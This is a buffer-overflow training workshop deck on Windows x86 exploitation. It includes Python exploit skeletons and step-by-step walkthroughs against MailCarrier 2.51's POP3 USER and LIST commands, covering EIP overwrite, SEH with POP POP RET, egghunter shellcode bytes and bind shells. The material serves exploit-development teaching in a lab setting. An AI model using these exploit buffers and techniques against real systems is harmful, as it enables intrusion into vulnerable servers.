Hack to Basics – x86 Windows Based Buffer Overflows, an introduction to buffer overflows
Instructor - Dino Covotsos – Telspace Systems
@telspacesystems
Whoami?
- Work in the Penetration Testing space (Telspace Systems).
- Approximately 20 years in.
- Trying to keep some sort of work/life balance! ;)
- Various qualifications – OSCP/OSCE etc.
Agenda
- Introduction to the workshop (we are here!).
- The Stack and Registers.
- Basic x86 ASM.
- Basic exploitation techniques.
- Fuzzing.
- Introduction to a variety of skeleton Python scripts (copy/paste buffer overflows, remote buffer overflows etc).
- Vanilla EIP overwrites in Immunity Debugger.
- Overwriting EIP, jumping to ESP, executing shellcode (generated by Metasploit or compiled from exploit-db/shell-storm).
- Bad characters and how to deal with them.
- Practical example (CVE-2019-11395).
- Introduction to SEH exploitation techniques.
- Introduction to Mona, basic asm jumps and shellcoding.
- Practical example (CVE-2019-11395).
- What are egghunters?
- Example of an egghunter being utilised in a SEH exploit.
- Questions and Answers.
- References.
The Stack and Registers (x86)
REF: http://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html
The 8 32-bit general purpose registers (EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI; the 16-bit names below are their low halves):
- Accumulator register (AX). Used in arithmetic operations.
- Counter register (CX). Used in shift/rotate instructions and loops.
- Data register (DX). Used in arithmetic operations and I/O operations.
- Base register (BX). Used as a pointer to data (located in segment register DS, when in segmented mode).
- Stack Pointer register (SP). Pointer to the top of the stack.
- Stack Base Pointer register (BP). Used to point to the base of the current stack frame.
- Source Index register (SI). Used as a pointer to a source in stream operations.
- Destination Index register (DI). Used as a pointer to a destination in stream operations.
Basic x86 ASM
x86 ASM (for this workshop): add/sub, xor, mov, push, pop, call, jmp (and conditional jumps).
Basic exploitation techniques
"Vanilla" EIP overwrite: direct EIP overwrite with an initial long buffer (no exception handler or similar involved). The saved return address on the stack is overwritten, so when the function returns, EIP is loaded with attacker-controlled bytes.
Structured Exception Handling (SEH) exploitation: an exception is an event that occurs during the execution of a program, and requires the execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions.
Overwrite the SEH handler pointer with the address of a POP POP RET sequence: the two POPs move ESP up by 8 bytes, so the RET returns to the value that was at [ESP+8] when the handler was called, which is the address of the overwritten exception registration record (i.e. our nSEH bytes). Execution therefore lands in attacker-controlled data right next to the handler.
REF: https://docs.microsoft.com/en-us/windows/desktop/debug/structured-exception-handling
Basic exploitation techniques
Structured Exception Handling (SEH) exploitation (continued):
Typical structure: "A" buffer + (Next SEH)/JMP + PPR + (nops) + shellcode
Basic exploitation techniques
Egghunters: an egghunter is a small piece of shellcode that searches memory for a larger shellcode, so that the larger shellcode can be executed from wherever it ended up (very useful in cases where there is only a small amount of space available in the buffer). Egghunters search memory for a "TAG", a unique 4-byte string. We repeat the tag so that the 8-byte egg is unique, for example WOOTWOOT, and place it directly in front of the shellcode we want to execute once found (i.e. we redirect execution flow to just past the egg).
Basic exploitation techniques
Egghunters, example (skape's NtAccessCheckAndAuditAlarm egghunter, egg 0x50905090):
loop_inc_page:
    or dx, 0x0fff          // OR in PAGE_SIZE-1: move edx to the last byte of the current page
loop_inc_one:
    inc edx                // Increment our pointer by one
loop_check:
    push edx               // Save edx
    push 0x2               // Push NtAccessCheckAndAuditAlarm
    pop eax                // Pop into eax
    int 0x2e               // Perform the syscall (it probes the page for us without faulting)
    cmp al, 0x05           // Did we get 0xc0000005 (ACCESS_VIOLATION)? Only the low byte is checked
    pop edx                // Restore edx
loop_check_8_valid:
    je loop_inc_page       // Yes, invalid ptr, go to the next page
is_egg:
    mov eax, 0x50905090    // Throw our egg in eax
    mov edi, edx           // Set edi to the pointer we validated
    scasd                  // Compare the dword in edi to eax (edi += 4)
    jnz loop_inc_one       // No match? Increment the pointer by one
    scasd                  // Compare the dword in edi to eax again (which is now edx+4)
    jnz loop_inc_one       // No match? Increment the pointer by one
matched:
    jmp edi                // Found the egg. Jump 8 bytes past it into our code.
REF: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf & https://www.fuzzysecurity.com/tutorials/expDev/4.html
Fuzzing
Google definition: fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks.
Manual testing (generation, mutation, manual coding etc).
Tools: Spike, Boofuzz, Peach, Sulley etc.
Fuzzing
Basic Spike template (s_string() is sent as-is, s_string_variable() marks a field Spike mutates):
s_string_variable("USER");
s_string(" ");
s_string_variable("FOO");
s_string("\r\n");
s_string("PASS");
s_string_variable("F00");
s_string_variable("\r\n");
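The same idea as the Spike template and the "send 6000 A's via USER" skeleton, written out as an added Python 3 example (not one of the workshop scripts): it generates USER lines of increasing length, sends each on a fresh connection, and reports the first length that gets no reply. The target address is a placeholder and the fake service in the test is constructed.

```python
import socket

# Placeholder lab target (assumption, not a value from the workshop slides).
TARGET = ("192.168.0.150", 110)


def fuzz_cases(command, start=100, stop=6000, step=500, filler="A"):
    """Build the (length, line) cases of an incremental length fuzzer.

    Each case is one POP3 command line, '<command> ' + filler * length + CRLF,
    i.e. the workshop's "send 6000 A's via USER" test taken in steps so the
    smallest crashing length is found rather than just a crash.
    """
    cases = []
    length = start
    while length <= stop:
        cases.append((length, "%s %s\r\n" % (command, filler * length)))
        length += step
    return cases


def first_unresponsive_length(send_and_recv, cases):
    """Feed cases to send_and_recv(line) -> reply bytes or None.

    Returns the argument length at which the service first gave no reply
    (crash, reset or timeout), or None if it answered every case.
    """
    for length, line in cases:
        if send_and_recv(line) is None:
            return length
    return None


def pop3_probe(target, timeout=3.0):
    """Return a send_and_recv callable using one fresh TCP connection per case."""
    def send_and_recv(line):
        try:
            with socket.create_connection(target, timeout=timeout) as s:
                s.recv(1024)                       # banner, e.g. "+OK ..."
                s.sendall(line.encode("latin-1"))
                return s.recv(1024)
        except OSError:                            # refused, reset or timed out
            return None
    return send_and_recv


if __name__ == "__main__":
    cases = fuzz_cases("USER")
    hit = first_unresponsive_length(pop3_probe(TARGET), cases)
    if hit is None:
        print("[*] Service answered every case up to %d bytes" % cases[-1][0])
    else:
        print("[!] No reply at %d bytes: attach Immunity Debugger and resend that case" % hit)
```

A service that answers and only then crashes shows up as the next case's connection being refused, so when a length is reported, replay the previous case under the debugger as well.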
Skeleton Python Scripts
On your USB/VM there are additional scripts:
Copy/Paste Skeleton Python Scripts (Local BOF example, SEH; Python 2 as used on the workshop VM):

shellcode = "<SHELLCODE>"     # msfvenom output goes here
nseh = "<NSEH>"               # 4 bytes: short jump over the handler (filled in during the SEH section)
seh = "<SEH>"                 # 4 bytes: packed POP POP RET address from !mona seh
nops = "\x90" * 16
buffer = "A" * 884 + nseh + seh + nops + shellcode + "D" * 8868
payload = buffer
try:
    f = open("exploit.txt", "w")
    print("[+] Creating %s bytes payload.." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
Skeleton Python Scripts
Socket Based Skeleton Python Scripts (remote BOF example, Vanilla; Python 2 as used on the workshop VM):

import socket
import time

shellcode = ""                # msfvenom output goes here once generated
jmp_esp = "<JMP ESP>"         # 4 bytes: packed address of a JMP ESP found with !mona jmp -r esp
nops = "\x90" * 16
# the "C" padding shrinks as shellcode is added so the total length stays the same as the crash buffer
buffer = "A" * 5094 + jmp_esp + nops + shellcode + "C" * (882 - len(shellcode))
print("[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n")
print("[*] Sending pwnage buffer: with %s bytes..." % len(buffer))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.150", 110))
print(s.recv(1024))
s.send('USER ' + buffer + '\r\n')
print(s.recv(1024))
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print("[*] Done, but if you get here the exploit failed!")
Vanilla EIP Overwrite
41414141 – The Magic Numbers.
Our aim in this portion of the workshop is to overwrite the EIP register by sending a long string, which will allow us to redirect program execution flow to shellcode of our choosing. In this case, it would be calc.exe or a bind shell.
Vanilla EIP Overwrite (MailCarrier)
- Attaching to the MailCarrier process, using Immunity Debugger (on your VM).
- Skeleton Python script, which will send 6000 A's via "USER" (on your VM).
- Overwriting EIP with "41414141" (four of our A's have replaced the saved return address).
- Generating a unique pattern with msf-pattern_create with length 6000 (msf-pattern_create -l 6000).
- Python script, with the unique pattern to send to MailCarrier.
- Executing the script, which carries the unique pattern.
- Obtaining an EIP overwrite with the unique pattern; we copy this value to find the exact offset. Immunity shows EIP as a little-endian dword, so the four pattern characters appear reversed; msf-pattern_offset accepts the hex value as displayed.
- Using msf-pattern_offset (msf-pattern_offset -q <EIP value> -l 6000) in order to obtain the exact offset, in this case 5094 bytes.
- We create our "B" buffer ("A" * 5094 + "B" * 4 + "C" padding), to confirm the exact offset and EIP overwrite.
- Confirming the correct offset and EIP overwrite via 42424242 ("B" * 4).
- We search for a JMP ESP to overwrite EIP with, via mona with "!mona jmp -r esp". At the crash ESP points into the "C" buffer just after EIP, so a JMP ESP lands execution in data we control. Pick an address from a module without ASLR/rebase protection and containing none of the bad characters (at minimum no null bytes).
- Adding the JMP ESP address (packed little-endian) to the Python script.
- We place a breakpoint at that address, and wait for the breakpoint to be hit, confirming the jump.
- We step through the instructions and confirm that we land in our "C" buffer.
- Generating our bind_tcp shellcode on port 443 with msfvenom, excluding the bad characters identified for this command with -b.
- Placing it into our Python script (1/2).
- Placing it into our Python script (2/2).
- Executing our Python script (full exploit).
- Obtaining our bind shell on port 443.
- Using Meterpreter to connect to the bind shell.
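The offset-finding and buffer-building steps above, as an added Python 3 example that is not the workshop's skeleton script: it reimplements the msf-pattern_create/msf-pattern_offset cycle, converts the EIP value Immunity shows back into the in-memory bytes, and assembles the vanilla buffer with the JMP ESP address packed little-endian and checked against bad characters. The JMP ESP address, the INT3 stub shellcode and the default bad-character set are placeholders/assumptions, not values taken from MailCarrier.

```python
from string import ascii_uppercase, ascii_lowercase, digits
from struct import pack

# Placeholders for this example (not values from the MailCarrier screenshots):
PLACEHOLDER_JMP_ESP = 0x12345678   # assumption: replace with the !mona jmp -r esp result
STUB_SHELLCODE = b"\xcc" * 32      # constructed stand-in: INT3s, so the debugger stops in it


def pattern_create(length):
    """Cyclic pattern with the same layout as msf-pattern_create: Aa0Aa1Aa2...Zz9.

    Every 4-byte window is unique within the 20280-byte cycle, which is what lets
    the four bytes that reach EIP be mapped back to one offset.
    """
    full = "".join(a + b + c for a in ascii_uppercase for b in ascii_lowercase for c in digits)
    if length > len(full):
        raise ValueError("a pattern longer than %d bytes repeats" % len(full))
    return full[:length]


def pattern_offset(pattern, value):
    """Offset of the 4 pattern bytes that landed in EIP, or -1 if not found.

    value is either the 4 characters as they sit in memory, or the 8 hex digits
    Immunity shows in EIP. x86 is little-endian, so the register shows the bytes
    reversed: EIP = 0x47386E47 means the bytes "Gn8G" were on the stack.
    """
    if len(value) == 8 and all(c in "0123456789abcdefABCDEF" for c in value):
        needle = bytes.fromhex(value)[::-1].decode("latin-1")
    elif len(value) == 4:
        needle = value
    else:
        raise ValueError("expected 4 characters or 8 hex digits")
    return pattern.find(needle)


def build_vanilla(offset, jmp_esp, shellcode, total_len, nop_count=16,
                  badchars=b"\x00\x0a\x0d"):
    """'A' * offset + packed JMP ESP + NOP sled + shellcode + 'C' padding.

    The address is packed little-endian so its bytes land in EIP in the right
    order; ESP points just past it, so the NOPs and shellcode are what JMP ESP
    reaches. badchars defaults to bytes a line-based command such as POP3 USER
    cannot carry (an assumption for this example): the address must avoid them,
    the shellcode is expected to have been encoded with msfvenom -b. The total
    length is kept constant so the crash matches the plain 'A' run.
    """
    addr = pack("<I", jmp_esp)
    bad = sorted(set(addr) & set(badchars))
    if bad:
        raise ValueError("JMP ESP address contains bad byte(s): %s" % ["%02x" % b for b in bad])
    body = b"A" * offset + addr + b"\x90" * nop_count + shellcode
    if len(body) > total_len:
        raise ValueError("payload (%d) exceeds the crash buffer length (%d)" % (len(body), total_len))
    return body + b"C" * (total_len - len(body))


if __name__ == "__main__":
    pattern = pattern_create(6000)
    eip_seen = pattern[5094:5098]            # simulate the workshop's 5094-byte offset
    print("[*] offset of %r is %d" % (eip_seen, pattern_offset(pattern, eip_seen)))
    exploit = build_vanilla(5094, PLACEHOLDER_JMP_ESP, STUB_SHELLCODE, 6000)
    print("[*] built %d-byte buffer, EIP bytes = %s" % (len(exploit), exploit[5094:5098].hex()))
```

The 41414141 from the first crash can never be located in the pattern (two uppercase letters never sit next to each other in it), which is exactly why the A's are swapped for the cyclic pattern before asking for an offset.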
SEH exploitation
41414141 – Still the magic numbers, just different!
Structured exception handling exploits compromise an application by overwriting the pointer of an exception handler with an attacker controlled address. SEH itself is Windows' exception handling mechanism, not an exploit mitigation: each frame's registration record (next pointer + handler pointer) lives on the stack, so a stack buffer overflow that runs far enough overwrites it, and the corrupted handler pointer is called as soon as an exception is raised (often by the overflow itself). The mitigations added later, SafeSEH and SEHOP, are what make this harder, which is why the POP POP RET must come from a module that was not compiled with SafeSEH.
REF: https://www.fuzzysecurity.com/tutorials/expDev/3.html
SEH exploitation (MailCarrier)
- Skeleton Python script to exploit the LIST command, post authentication (test/test).
- Sending 10000 A's via the LIST command.
- EIP is not overwritten, but an access violation is raised; we pass the exception to the program (Shift+F9 in Immunity Debugger) and continue execution.
- EIP is now overwritten with 41414141, and the SEH chain shows our A's (the dispatcher called our corrupted handler pointer).
- In the same way as the previous exploit, we use msf-pattern_create to create a unique pattern with 10000 bytes.
- Python script with the pattern.
- The SEH chain shows the overwrite; we then match that with msf-pattern_offset to an offset of 6178 bytes.
- We modify our buffer to overwrite nSEH and SEH with "BBBB" and "CCCC".
- The SEH chain now shows we control nSEH and SEH accordingly.
- We use "!mona seh" to search for a POP POP RET instruction sequence (from a module that is not SafeSEH-compiled, at an address with no bad characters).
- Our PPR address is then added to our exploit, with nSEH added as "G" * 4.
- We place a breakpoint at our PPR instruction, to make sure it is being executed properly.
- We execute our PPR instruction, and land in our 4 "G" bytes (the nSEH field), which we can now use to jump.
- We use these 4 bytes to assemble a JMP SHORT to a location after the handler (EB 12: jump 0x12 bytes forward from the end of the 2-byte instruction, padded with two NOPs to fill the field).
- We modify our Python script to add our nSEH jump and some NOPs (we want to land in the NOPs).
- Using breakpoints and stepping through, we finally land in our NOPs and can add our shellcode.
- Using msfvenom, we generate our bind shell once again.
- We add this to our final exploit (1/2).
- We add this to our final exploit (2/2).
- We then run the final Python exploit, and hope to get a bind shell on the target.
- Success, we have our bind shell waiting on port 443.
- Connected to our bind shell via MSF.
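The SEH record assembly described above, as an added Python 3 example (not the workshop's skeleton): it encodes the JMP SHORT for the nSEH field, packs the POP POP RET address, explains in code why that RET lands on nSEH, and verifies that the jump (the usual EB 06, or the deck's EB 12) ends up inside the NOP sled. The POP POP RET address, the INT3 stub shellcode and the default bad-character set are placeholders/assumptions, not values from the MailCarrier screenshots.

```python
from struct import pack

# Placeholders for this example (not values from the MailCarrier screenshots):
PLACEHOLDER_PPR = 0x1002D5B7       # assumption: replace with a !mona seh result
STUB_SHELLCODE = b"\xcc" * 32      # constructed stand-in: INT3s


def short_jmp(rel8, fill=b"\x90\x90"):
    """Encode JMP SHORT rel8 as the 4-byte nSEH field.

    rel8 is counted from the end of the 2-byte instruction. nSEH is directly
    followed by the 4-byte handler address, so rel8 = 6 hops over the handler
    into the first byte after it. The two fill bytes are never executed.
    """
    if not -128 <= rel8 <= 127:
        raise ValueError("JMP SHORT only reaches -128..+127 bytes")
    return b"\xeb" + pack("<b", rel8) + fill


def jmp_landing(nseh_offset, rel8):
    """Buffer offset the JMP SHORT stored at nseh_offset transfers to."""
    return nseh_offset + 2 + rel8


def build_seh(offset, ppr, shellcode, total_len, nop_count=16, rel8=6,
              badchars=b"\x00\x0a\x0d"):
    """'A' * offset + nSEH (JMP SHORT) + SEH (POP POP RET) + NOPs + shellcode + 'D' padding.

    Why POP POP RET lands on nSEH: the dispatcher calls our 'handler' like any
    _except_handler, so on entry the stack holds [return address]
    [ExceptionRecord*][EstablisherFrame*]... Two POPs discard the first two,
    RET consumes EstablisherFrame*, which is the address of the overwritten
    registration record, i.e. our nSEH bytes. The JMP SHORT stored there skips
    the 4-byte handler address and lands in the NOP sled.
    badchars defaults to bytes a line-based command (here the POP3 LIST) cannot
    carry; this default is an assumption for the example.
    """
    handler = pack("<I", ppr)
    bad = sorted(set(handler) & set(badchars))
    if bad:
        raise ValueError("POP POP RET address contains bad byte(s): %s" % ["%02x" % b for b in bad])
    body = b"A" * offset + short_jmp(rel8) + handler + b"\x90" * nop_count + shellcode
    if len(body) > total_len:
        raise ValueError("payload (%d) exceeds the crash buffer length (%d)" % (len(body), total_len))
    buf = body + b"D" * (total_len - len(body))
    land = jmp_landing(offset, rel8)
    if buf[land] != 0x90:
        raise ValueError("nSEH jump lands at offset %d, outside the NOP sled" % land)
    return buf


if __name__ == "__main__":
    exploit = build_seh(6178, PLACEHOLDER_PPR, STUB_SHELLCODE, 10000)
    print("[*] nSEH = %s, SEH = %s, jump lands at %d"
          % (exploit[6178:6182].hex(), exploit[6182:6186].hex(), jmp_landing(6178, 6)))
```

With the default 16-byte sled both EB 06 and the deck's EB 12 land on a NOP; a larger rel8 with a short sled would be caught by the final check instead of being discovered as a crash in the debugger.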
Egghunters
Playing with limited buffer space can be fun! An egghunter is a small piece of shellcode that will search memory for a specific pattern (the egg). Once this is found, it will then execute the full shellcode that follows the egg in a larger area of available buffer space (sometimes delivered via another stored variable or request). We will expand upon the SEH exploit from the previous example, with the use of an egghunter to find our shellcode. The hunter walks the whole process address space page by page, so it takes a moment before the shellcode runs.
Additional information: https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
Egghunters (MailCarrier)
- We start with our skeleton Python script, which uses nSEH, SEH and NOPs (no shellcode this time).
- We land in our NOPs as expected, which will allow us to place and execute our egghunter there.
- Using msf-egghunter to generate our egghunter, with \x00 as the only bad char and a tag of WOOT (the egg in memory is the tag twice, WOOTWOOT).
- Adding the egghunter to our code, also including the WOOTWOOT tag just after the initial "A" buffer (the shellcode will follow the tag).
- Executing our script with our egghunter; if all goes well we should find WOOTWOOT in memory.
- Our egghunter tag is found; we can now place NOPs and shellcode after it!
- Once again, we generate our shellcode using msfvenom.
- Adding the shellcode to our exploit (1/2).
- Adding the shellcode to our exploit (2/2).
- Running our final exploit with egghunter and shellcode.
- By setting breakpoints and stepping through the execution, we can see our egghunter searching.
- We set another strategic breakpoint (e.g. on the egghunter's final JMP EDI) for after our WOOTWOOT is found in memory, then continue.
- To confirm, we find our tag in memory, followed by our NOPs and shellcode.
- We continue execution, find our NOPs and the shellcode executes correctly.
- Bind shell waiting on port 443 for us to connect to.
- Connecting to our bind shell!
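As an added Python 3 example (not msf-egghunter's code nor a workshop script), the egghunter assembly shown earlier in the deck is emitted as bytes for a chosen tag, checked against bad characters, and its final JMP EDI is simulated over a constructed memory image. It also shows why the egg is the tag doubled: the single tag sits inside the hunter itself (the mov eax immediate), so a one-copy search would find the hunter rather than the shellcode. The memory image and stub shellcode are constructed for the example.

```python
def egghunter(tag):
    """Return the 32-byte hunter that scans for tag repeated twice (the egg)."""
    if len(tag) != 4:
        raise ValueError("the tag must be exactly 4 bytes, e.g. b'WOOT'")
    parts = [
        b"\x66\x81\xca\xff\x0f",   # loop_inc_page: or dx, 0x0fff   (edx -> last byte of this page)
        b"\x42",                   # loop_inc_one:  inc edx
        b"\x52",                   # loop_check:    push edx
        b"\x6a\x02",               #                push 2          (NtAccessCheckAndAuditAlarm)
        b"\x58",                   #                pop eax
        b"\xcd\x2e",               #                int 0x2e        (syscall probes the page)
        b"\x3c\x05",               #                cmp al, 5       (0xc0000005 = access violation?)
        b"\x5a",                   #                pop edx
        b"\x74\xef",               #                je loop_inc_page   (-17 bytes)
        b"\xb8" + tag,             # is_egg:        mov eax, tag
        b"\x8b\xfa",               #                mov edi, edx
        b"\xaf",                   #                scasd           (cmp [edi], eax; edi += 4)
        b"\x75\xea",               #                jnz loop_inc_one   (-22 bytes)
        b"\xaf",                   #                scasd           (second copy of the tag)
        b"\x75\xe7",               #                jnz loop_inc_one   (-25 bytes)
        b"\xff\xe7",               # matched:       jmp edi         (edi is now egg + 8)
    ]
    return b"".join(parts)


def find_badchars(blob, badchars):
    """Bytes from badchars that occur in blob (sorted); the hunter must be clean."""
    return sorted(set(blob) & set(badchars))


def find_egg(memory, tag):
    """Offset the hunter's JMP EDI would reach: first tag+tag match + 8, or -1.

    The search is for the doubled tag because the hunter carries one copy of the
    tag in its own mov eax immediate; matching a single copy would jump into the
    hunter instead of the shellcode.
    """
    idx = memory.find(tag + tag)
    return -1 if idx < 0 else idx + 8


def demo_memory(tag, shellcode, hunter):
    """Constructed memory image: junk, the hunter, filler, then egg + NOPs + shellcode."""
    return b"\x00" * 100 + hunter + b"A" * 50 + tag + tag + b"\x90" * 8 + shellcode


if __name__ == "__main__":
    tag = b"WOOT"
    hunter = egghunter(tag)
    print("[*] %d-byte hunter, bad bytes vs \\x00: %s" % (len(hunter), find_badchars(hunter, b"\x00")))
    mem = demo_memory(tag, b"\xcc" * 16, hunter)
    print("[*] JMP EDI would land at offset %d" % find_egg(mem, tag))
```

The hunter contains 0xff and 0x0f (from `or dx, 0x0fff`) but no null byte, which is why "\x00 as the only bad char" needs no changes to it; a protocol that also rejects 0xff would need a different hunter encoding.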
@telspacesystems www.telspace.co.za
References and thanks to:
- FuzzySecurity
- Corelan (Peter!)
- Offsec
- Matt Miller (skape)
- DEF CON (Jeff, Nikita, Highwiz, Tottenkoph and all crew)
- The Telspace Systems Crew (https://www.telspace.co.za)